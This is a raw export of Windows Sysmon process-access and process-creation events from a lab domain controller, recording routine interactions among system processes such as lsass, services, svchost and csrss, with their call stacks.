10:39:53.636{733EE690-3DF7-5F80-0B00-000000007F01}8681096C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000809Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.636{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000808Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.636{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000807Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.636{733EE690-3DF7-5F80-0A00-000000007F01}8521292C:\Windows\system32\services.exe{733EE690-3DF9-5F80-1100-000000007F01}1200C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000806Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.636{733EE690-3DF7-5F80-0B00-000000007F01}8681096C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000805Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.636{733EE690-3DF7-5F80-0A00-000000007F01}8521228C:\Windows\system32\services.exe{733EE690-3DF9-5F80-1200-000000007F01}1208C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000804Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.636{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1100-000000007F01}1200C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000803Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.636{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1200-000000007F01}1208C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000802Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.636{733EE690-3DF7-5F80-0500-000000007F01}644792C:\Windows\system32\csrss.exe{733EE690-3DF9-5F80-1300-000000007F01}1252C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000801Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.636{733EE690-3DF7-5F80-0A00-000000007F01}8521224C:\Windows\system32\services.exe{733EE690-3DF9-5F80-1300-000000007F01}1252C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000800Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.636{733EE690-3DF7-5F80-0B00-000000007F01}8681096C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000799Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.636{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000798Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.636{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000797Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.636{733EE690-3DF7-5F80-0B00-000000007F01}8681096C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000796Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.620{733EE690-3DF7-5F80-0500-000000007F01}644792C:\Windows\system32\csrss.exe{733EE690-3DF9-5F80-1200-000000007F01}1208C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000795Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.620{733EE690-3DF7-5F80-0500-000000007F01}644660C:\Windows\system32\csrss.exe{733EE690-3DF9-5F80-1100-000000007F01}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000794Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.620{733EE690-3DF7-5F80-0A00-000000007F01}8521116C:\Windows\system32\services.exe{733EE690-3DF9-5F80-1200-000000007F01}1208C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000793Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.632{733EE690-3DF9-5F80-1200-000000007F01}1208C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\system32\svchost.exe -k LocalServiceC:\Windows\system32\NT AUTHORITY\LOCAL SERVICE{733EE690-3DF9-5F80-E503-000000000000}0x3e50SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x8000000000000000792Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.620{733EE690-3DF7-5F80-0A00-000000007F01}8521112C:\Windows\system32\services.exe{733EE690-3DF9-5F80-1100-000000007F01}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000791Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.620{733EE690-3DF7-5F80-0A00-000000007F01}8521148C:\Windows\system32\services.exe{733EE690-3DF9-5F80-0F00-000000007F01}1124C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000790Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.620{733EE690-3DF7-5F80-0A00-000000007F01}8521148C:\Windows\system32\services.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000789Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.620{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-0F00-000000007F01}1124C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000788Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.620{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000787Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.604{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0900-000000007F01}780C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000786Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.604{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0900-000000007F01}780C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000785Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.604{733EE690-3DF7-5F80-0500-000000007F01}644792C:\Windows\system32\csrss.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000784Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.604{733EE690-3DF7-5F80-0500-000000007F01}644660C:\Windows\system32\csrss.exe{733EE690-3DF9-5F80-0F00-000000007F01}1124C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000783Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 